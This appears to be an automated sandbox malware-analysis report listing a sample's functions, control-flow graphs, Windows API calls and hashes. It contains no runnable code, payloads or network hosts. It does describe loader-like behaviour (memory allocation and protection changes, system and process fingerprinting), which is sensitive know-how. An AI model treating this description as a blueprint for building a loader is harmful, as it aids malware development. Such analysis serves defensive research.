                                                                  control_flow_graph 290 21f30d0-21f30e6 291 21f30ea-21f30ef 290->291 292 21f30f0-21f30f5 291->292 293 21f31ac-21f31b1 292->293 294 21f30fb 292->294 295 21f3226-21f32b0 293->295 296 21f31b3-21f31b8 293->296 297 21f3198-21f319c 294->297 298 21f3101-21f3106 294->298 295->292 301 21f31ec-21f31f4 296->301 302 21f31ba-21f31bf 296->302 299 21f3303-21f330d 297->299 300 21f31a2-21f31a7 297->300 303 21f310c-21f3111 298->303 304 21f32b5-21f32bd 298->304 300->292 309 21f31f6-21f320e call 21f3f20 call 21f3e80 301->309 310 21f3214-21f3221 301->310 307 21f31d4-21f31d9 302->307 308 21f31c1-21f31cf 302->308 311 21f312e-21f3135 303->311 312 21f3113-21f3118 303->312 305 21f32bf-21f32d7 call 21f3f20 call 21f3e80 304->305 306 21f32dd-21f3300 304->306 305->306 306->299 307->292 316 21f31df-21f31e9 307->316 308->292 309->310 310->291 313 21f3137-21f314d call 21f3f20 call 21f3e80 311->313 314 21f3152-21f315d 311->314 312->307 318 21f311e-21f312c call 21f3d10 312->318 313->314 332 21f315f-21f3175 call 21f3f20 call 21f3e80 314->332 333 21f317a-21f3188 RtlAllocateHeap 314->333 318->291 332->333 333->299 337 21f318e-21f3193 333->337 337->291
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 021F3182
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: &$B$S=$p^5w
                                                                  • API String ID: 1279760036-3144705412
                                                                  • Opcode ID: 437eb428603c2a3755aad44285a08f30e9105e7213a1e2f6941e12d76c8f3ecd
                                                                  • Instruction ID: c7efb321e7db2874c187539f99da600cb7420d609db72f27dabdb2a3b2b85b9a
                                                                  • Opcode Fuzzy Hash: 437eb428603c2a3755aad44285a08f30e9105e7213a1e2f6941e12d76c8f3ecd
                                                                  • Instruction Fuzzy Hash: 85510672B483819FCB98DE28949412FB7E6FBD0344F20485EF276C7250DB70D9868B92
                                                                  Function 021F9C10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 95stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 383 21f9c10-21f9c1e 384 21f9c20-21f9c25 383->384 385 21f9c2b 384->385 386 21f9cd3-21f9cd8 384->386 387 21f9cc9-21f9cce 385->387 388 21f9c31-21f9c36 385->388 389 21f9cde-21f9ce5 386->389 390 21f9c43-21f9c48 386->390 387->384 391 21f9c38-21f9c3d 388->391 392 21f9c56-21f9c66 388->392 394 21f9ce7-21f9cfd call 21f3f20 call 21f3e80 389->394 395 21f9d02-21f9d18 389->395 390->384 393 21f9c4a-21f9c55 390->393 391->390 396 21f9d1d-21f9d24 391->396 397 21f9c68-21f9c80 call 21f3f20 call 21f3e80 392->397 398 21f9c86-21f9c8e 392->398 394->395 395->384 400 21f9d26-21f9d3c call 21f3f20 call 21f3e80 396->400 401 21f9d41-21f9d65 lstrcmpiW 396->401 397->398 404 21f9cae-21f9cc4 GetCurrentProcess QueryFullProcessImageNameW 398->404 405 21f9c90-21f9ca8 call 21f3f20 call 21f3e80 398->405 400->401 404->384 405->404
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 021F9CBA
                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 021F9CBD
                                                                  • lstrcmpiW.KERNELBASE(?,?), ref: 021F9D4E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentFullImageNameQuerylstrcmpi
                                                                  • String ID: C$v$79V#
                                                                  • API String ID: 3605714105-434289715
                                                                  • Opcode ID: ee5835c1042dfa1da904ab84e1a4106f8cd1e31a0870c21599e390da410e6283
                                                                  • Instruction ID: cebd40fceb828ee445b3ed3fea2a1dc3483133382960dac653a7f3255579c28b
                                                                  • Opcode Fuzzy Hash: ee5835c1042dfa1da904ab84e1a4106f8cd1e31a0870c21599e390da410e6283
                                                                  • Instruction Fuzzy Hash: 56310572B802489FD7A4FB68A49077B22D6ABC0354F25086AE775CB280EB71CC44CF91
                                                                  Function 021F5BC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 021F5C1B
                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 021F5C8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Heap$AllocateFree
                                                                  • String ID: p^5w
                                                                  • API String ID: 2488874121-1074354707
                                                                  • Opcode ID: f998d841d3e53dae81e17e700950d0863be564b6bdba1154c4861be36005fba3
                                                                  • Instruction ID: a265711e7b0c301eb1bc13861c2a6f56bdf6898d8b694dd5552a827caccb8271
                                                                  • Opcode Fuzzy Hash: f998d841d3e53dae81e17e700950d0863be564b6bdba1154c4861be36005fba3
                                                                  • Instruction Fuzzy Hash: 65117F72F812027FD794AAB5689062B26DBABC0694B544878F736CB340EB60CC514BD1
                                                                  Function 0218002D Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 506 218002d-218009e call 2180456 * 6 519 21800a0-21800a2 506->519 520 21800a7-21800b0 506->520 521 218044e-2180455 519->521 520->519 522 21800b2-21800b6 520->522 522->519 523 21800b8-21800c2 522->523 524 21800e4-2180105 GetNativeSystemInfo 523->524 525 21800c4-21800c7 523->525 524->519 527 2180107-218012d VirtualAlloc 524->527 526 21800c9-21800cf 525->526 528 21800d1-21800d4 526->528 529 21800d6 526->529 530 218012f-2180133 527->530 531 2180162-218016c 527->531 534 21800d9-21800e2 528->534 529->534 535 2180135-2180138 530->535 532 218016e-2180173 531->532 533 21801a4-21801b5 531->533 536 2180177-218018a 532->536 537 2180234-2180240 533->537 538 21801b7-21801d1 533->538 534->524 534->526 539 218013a-2180142 535->539 540 2180153-2180155 535->540 541 2180199-218019e 536->541 542 218018c-2180193 536->542 543 21802f0-21802fa 537->543 544 2180246-218025d 537->544 559 2180222-218022e 538->559 560 21801d3 538->560 539->540 545 2180144-2180147 539->545 546 2180157-218015c 540->546 541->536 550 21801a0 541->550 542->542 547 2180195 542->547 548 2180300-2180307 543->548 549 21803b2-21803c7 call 21b27b0 543->549 544->543 551 2180263-2180273 544->551 553 2180149-218014c 545->553 554 218014e-2180151 545->554 546->535 555 218015e 546->555 547->541 556 2180309-2180312 548->556 581 21803c9-21803ce 549->581 550->533 557 21802d5-21802e6 551->557 558 2180275-2180279 551->558 553->540 553->554 554->546 555->531 563 2180318-2180333 556->563 564 21803a7-21803ac 556->564 557->551 561 21802ec 557->561 565 218027a-2180289 558->565 559->538 562 2180230 559->562 566 21801d7-21801db 560->566 561->543 562->537 568 218034d-218034f 563->568 569 2180335-2180337 563->569 564->549 564->556 570 218028b-218028f 565->570 571 2180291-218029a 565->571 572 21801fb-2180204 566->572 573 21801dd 566->573 578 2180368-218036a 568->578 579 2180351-2180353 568->579 574 2180339-218033e 569->574 575 2180340-2180343 569->575 570->571 576 218029c-21802a1 570->576 577 21802c3-21802c7 571->577 584 2180207-218021c 572->584 573->572 580 21801df-21801f9 573->580 588 2180345-218034b 574->588 575->588 589 21802a3-21802b2 576->589 590 21802b4-21802b7 576->590 577->565 585 21802c9-21802d1 577->585 586 218036c 578->586 587 2180371-2180376 578->587 591 2180359-218035b 579->591 592 2180355-2180357 579->592 580->584 582 218044c 581->582 583 21803d0-21803d4 581->583 582->521 583->582 594 21803d6-21803e0 583->594 584->566 595 218021e 584->595 585->557 596 218036e-218036f 586->596 597 2180379-2180380 587->597 588->597 589->577 590->577 598 21802b9-21802bf 590->598 591->578 593 218035d-218035f 591->593 592->596 593->597 599 2180361-2180366 593->599 594->582 600 21803e2-21803e6 594->600 595->559 596->597 601 2180388-218039d VirtualProtect 597->601 602 2180382 597->602 598->577 599->597 600->582 603 21803e8-21803f9 600->603 601->519 604 21803a3 601->604 602->601 603->582 605 21803fb-2180400 603->605 604->564 606 2180402-218040f 605->606 606->606 607 2180411-2180415 606->607 608 218042d-2180433 607->608 609 2180417-2180429 607->609 608->582 611 2180435-218044b 608->611 609->605 610 218042b 609->610 610->582 611->582
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,02180005), ref: 021800E9
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02180005), ref: 02180111
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_2180000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                  • String ID:
                                                                  • API String ID: 2032221330-0
                                                                  • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction ID: c843fc4d28b37ed538c78f628ef067e7ef00afac4c7e7d8a4bf5ab4dcc212224
                                                                  • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction Fuzzy Hash: ABD1AE71A8870A8FD714EF69C8C076AB3E1FF88318F18452DE8959B241E774E859CF91
                                                                  Function 021F99A0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 709 21f99a0-21f99b6 710 21f99c0-21f99c5 709->710 711 21f9b2f-21f9b34 710->711 712 21f99cb 710->712 715 21f9b3a-21f9b3f 711->715 716 21f9bd0-21f9bd7 711->716 713 21f9ac3-21f9aca 712->713 714 21f99d1-21f99d6 712->714 721 21f9acc-21f9ae2 call 21f3f20 call 21f3e80 713->721 722 21f9ae7-21f9afc 713->722 719 21f99dc-21f99e1 714->719 720 21f9a68-21f9a7f 714->720 723 21f9bb8-21f9bbd 715->723 724 21f9b41-21f9b48 715->724 717 21f9bd9-21f9bef call 21f3f20 call 21f3e80 716->717 718 21f9bf4 716->718 717->718 738 21f9bf7-21f9c01 718->738 726 21f99f5-21f99fc call 21f9c10 719->726 727 21f99e3-21f99e8 719->727 732 21f9a9c-21f9aad 720->732 733 21f9a81-21f9a97 call 21f3f20 call 21f3e80 720->733 721->722 744 21f9afe-21f9b14 call 21f3f20 call 21f3e80 722->744 745 21f9b19-21f9b2a 722->745 723->710 731 21f9bc3-21f9bcd 723->731 729 21f9b4a-21f9b60 call 21f3f20 call 21f3e80 724->729 730 21f9b65-21f9b72 FindFirstChangeNotificationW call 21f9c10 724->730 758 21f99fe-21f9a06 726->758 759 21f9a37-21f9a3e 726->759 727->723 739 21f99ee-21f99f3 727->739 729->730 747 21f9b77-21f9b79 730->747 732->738 757 21f9ab3-21f9abe 732->757 733->732 739->710 744->745 745->710 755 21f9b7f-21f9b86 747->755 756 21f9a5e-21f9a63 747->756 765 21f9b88-21f9b9e call 21f3f20 call 21f3e80 755->765 766 21f9ba3-21f9bb3 755->766 756->710 757->710 770 21f9a08-21f9a20 call 21f3f20 call 21f3e80 758->770 771 21f9a26-21f9a35 758->771 767 21f9a5b 759->767 768 21f9a40-21f9a56 call 21f3f20 call 21f3e80 759->768 765->766 766->710 767->756 768->767 770->771 771->710
                                                                  APIs
                                                                  • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 021F9B6E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ChangeFindFirstNotification
                                                                  • String ID: +Y6t
                                                                  • API String ID: 1065410024-3949905484
                                                                  • Opcode ID: 63ded62093aca15ba790b883cc805a748aae774445130bfa27a0770861c215c0
                                                                  • Instruction ID: 439164742fb5fc3b837fc3b356d269e1c39bbac694c00e5ea9cf0366e8157a0f
                                                                  • Opcode Fuzzy Hash: 63ded62093aca15ba790b883cc805a748aae774445130bfa27a0770861c215c0
                                                                  • Instruction Fuzzy Hash: 6C516374B802419FDBA8FB65A890B7F32D66B84344B15485EFB75CB280EB70C9518B92
                                                                  Function 021F9D70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 788 21f9d70-21f9d7c 789 21f9d80-21f9d85 788->789 790 21f9de7-21f9dee 789->790 791 21f9d87-21f9d8c 789->791 794 21f9e0b-21f9e16 790->794 795 21f9df0-21f9e06 call 21f3f20 call 21f3e80 790->795 792 21f9d8e-21f9d93 791->792 793 21f9da9-21f9db0 791->793 797 21f9d99-21f9d9e 792->797 798 21f9e50-21f9e57 792->798 799 21f9dcd-21f9de5 793->799 800 21f9db2-21f9dc8 call 21f3f20 call 21f3e80 793->800 810 21f9e18-21f9e2e call 21f3f20 call 21f3e80 794->810 811 21f9e33-21f9e44 794->811 795->794 797->789 804 21f9da0-21f9da8 797->804 802 21f9e59-21f9e6f call 21f3f20 call 21f3e80 798->802 803 21f9e74-21f9e8b CreateThread 798->803 799->789 800->799 802->803 809 21f9e8e-21f9e96 803->809 810->811 811->809 824 21f9e46-21f9e4b 811->824 824->789
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,021F99A0,00000000,00000000,00000000), ref: 021F9E83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID: p^5w
                                                                  • API String ID: 2422867632-1074354707
                                                                  • Opcode ID: a38138dbb4b17f40e6f6528759be6b83f1cb7f04227724e74754ccf247a50969
                                                                  • Instruction ID: 1addb316279465dd207ef45ce32087bc5c2f8c38959e7dbb1eadac55df1cd9fc
                                                                  • Opcode Fuzzy Hash: a38138dbb4b17f40e6f6528759be6b83f1cb7f04227724e74754ccf247a50969
                                                                  • Instruction Fuzzy Hash: 7E215E31BC12416BEBE4AA75A951B3A22D3AB80744F24485DE736CF2C1FB61D8518B86
                                                                  Function 021F5360 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 826 21f5360-21f536e 827 21f5370-21f5375 826->827 828 21f537b 827->828 829 21f5421-21f5426 827->829 830 21f540d-21f541c 828->830 831 21f5381-21f5386 828->831 832 21f5428-21f542d 829->832 833 21f5466-21f547b 829->833 830->827 834 21f538c-21f5391 831->834 835 21f5480-21f548e 831->835 836 21f542f-21f5434 832->836 837 21f545c-21f5461 832->837 833->827 840 21f53d8-21f53df 834->840 841 21f5393-21f5398 834->841 838 21f5447-21f544c 836->838 839 21f5436-21f5442 836->839 837->827 838->827 842 21f5452-21f545b 838->842 839->827 843 21f53fc-21f5408 GetNativeSystemInfo 840->843 844 21f53e1-21f53f7 call 21f3f20 call 21f3e80 840->844 841->838 845 21f539e-21f53ad 841->845 843->827 844->843 847 21f53af-21f53c5 call 21f3f20 call 21f3e80 845->847 848 21f53ca-21f53d6 845->848 847->848 848->827
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(2564BE4F,2564BE4F), ref: 021F5401
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoNativeSystem
                                                                  • String ID: Ei
                                                                  • API String ID: 1721193555-3988083245
                                                                  • Opcode ID: 2b79accd1d5cd339f61f6048b750433f64ede1cad25719f14cf14755a0cf9615
                                                                  • Instruction ID: b0a3e23f95728da6301c680fe57a2eb477887c73effab68121756fe7090766fe
                                                                  • Opcode Fuzzy Hash: 2b79accd1d5cd339f61f6048b750433f64ede1cad25719f14cf14755a0cf9615
                                                                  • Instruction Fuzzy Hash: 04213D71E84250A7C6E48A6CA4C427F79D35794388FD4092AE779DB350FB64C9408B82
                                                                  Function 021F5490 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 857 21f5490-21f54a4 858 21f54a6-21f54bc call 21f3f20 call 21f3e80 857->858 859 21f54c1-21f54cf 857->859 858->859 864 21f5533-21f553c 859->864 865 21f54d1-21f54db 859->865 866 21f54dd 865->866 867 21f54f7-21f54fe 865->867 869 21f54e0-21f54e4 866->869 870 21f551b-21f5531 GetVolumeInformationW 867->870 871 21f5500-21f5516 call 21f3f20 call 21f3e80 867->871 872 21f54e6-21f54ed 869->872 873 21f54f1-21f54f3 869->873 870->864 871->870 872->869 875 21f54ef 872->875 873->867 875->867
                                                                  APIs
                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 021F5531
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InformationVolume
                                                                  • String ID: P4#v
                                                                  • API String ID: 2039140958-3471064730
                                                                  • Opcode ID: 2203e711a9237f014466ee8a29539de26a7dc0a411d9fb45e2dddc3b3f5e65f2
                                                                  • Instruction ID: 9fa8f3bd7f7788722e7d8611c4d81a0dc13356b0fcb73aa9b4d781b59fcd9501
                                                                  • Opcode Fuzzy Hash: 2203e711a9237f014466ee8a29539de26a7dc0a411d9fb45e2dddc3b3f5e65f2
                                                                  • Instruction Fuzzy Hash: DC113070A84300ABE794EB64D855B6676E2AB80704F94881CE7758B1D0FB74D945CB52
                                                                  Function 021F42F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 879 21f42f0-21f42fb 880 21f42fd-21f4313 call 21f3f20 call 21f3e80 879->880 881 21f4318-21f4323 879->881 880->881 885 21f4325-21f433b call 21f3f20 call 21f3e80 881->885 886 21f4340-21f4348 RtlAllocateHeap 881->886 885->886
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 021F4344
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: p^5w
                                                                  • API String ID: 1279760036-1074354707
                                                                  • Opcode ID: c88f70897a9388bc77e16b17d5723b0861244cb8dc6722596ee6057040e77e96
                                                                  • Instruction ID: b0908abe1a9c2d8a2416baebad0865fbe4d4a124f135d4ae311b14b4f63af7ec
                                                                  • Opcode Fuzzy Hash: c88f70897a9388bc77e16b17d5723b0861244cb8dc6722596ee6057040e77e96
                                                                  • Instruction Fuzzy Hash: 7EE03966B812116EDBD4A7B5B854A7F22EBABC06803158869F732CB344FF608C414BD1
                                                                  Function 021B1D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 90c9098b3b1810c4423cb8c37353cda5e5a2631d078fdfc78f2f65b35950e462
                                                                  • Instruction ID: 52f98e4d7ff986962f88fae1e542cdfbc5c8abbadffb4e660ff7225fe0376974
                                                                  • Opcode Fuzzy Hash: 90c9098b3b1810c4423cb8c37353cda5e5a2631d078fdfc78f2f65b35950e462
                                                                  • Instruction Fuzzy Hash: 9E41A778A40109EFDB05CF54C4A4BEAB7B2FF88314F25C559E8199B355C775EA82CB80
                                                                  Function 021F6FB0 Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,021F68DC), ref: 021F70F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: bff7881afb69966ba25f20670d9099a30b6d73bb63cc6d86949ab23f1b18302d
                                                                  • Instruction ID: d85e731e758b84ce13fc5c334d9120926fe23c955e1559c941d0ec5cab316855
                                                                  • Opcode Fuzzy Hash: bff7881afb69966ba25f20670d9099a30b6d73bb63cc6d86949ab23f1b18302d
                                                                  • Instruction Fuzzy Hash: D031B9107C41425BD6E86A6965A033B515B9B82344F2A086EF332CF7C5DF65CD429BD3
                                                                  Function 021F6F10 Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,021F704F,021F68DC), ref: 021F6F40
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
